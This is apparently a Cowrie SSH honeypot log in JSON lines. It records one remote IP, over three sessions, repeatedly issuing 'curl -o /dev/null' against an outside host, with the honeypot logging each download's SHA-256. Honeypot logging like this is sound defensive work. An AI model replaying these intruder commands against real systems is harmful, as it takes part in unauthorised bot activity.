{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:15.424160Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:15.455940Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:15.458136Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:15.461201Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:15.462954Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:15.463625Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:15.467259Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:15.468617Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:15.470217Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:15.471152Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:15.504236Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:15.505450Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:15.506046Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:15.508746Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:15.509393Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:15.511323Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:15.512135Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:15.516414Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:15.520344Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:15.523378Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:15.551382Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:15.552501Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:15.553108Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:15.559275Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:15.560067Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:15.562249Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:15.563285Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:15.593991Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:15.596254Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:15.597748Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:15.598633Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:15.604480Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:15.606153Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:15.607122Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:15.608442Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:15.609310Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:15.616205Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:15.647289Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:15.648145Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:15.652808Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:15.654479Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:15.655194Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:15.658012Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:15.658961Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:15.692305Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:15.695620Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:15.698806Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:15.702532Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:15.705116Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:15.705955Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:15.707842Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:15.708546Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:15.710095Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:15.710739Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:15.717002Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:15.752383Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:15.754686Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:15.756784Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:15.757751Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:15.761217Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:15.761821Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:15.763904Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:15.764679Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:15.799060Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:15.801198Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:15.804585Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:15.808862Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:15.810876Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:15.811951Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:15.813956Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:15.814608Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:15.816935Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:15.817971Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:15.883819Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:15.886041Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:15.888826Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:15.890419Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:15.890975Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:15.893395Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:15.894680Z","src_ip":"212.227.125.160","session":"9f264c568782"}
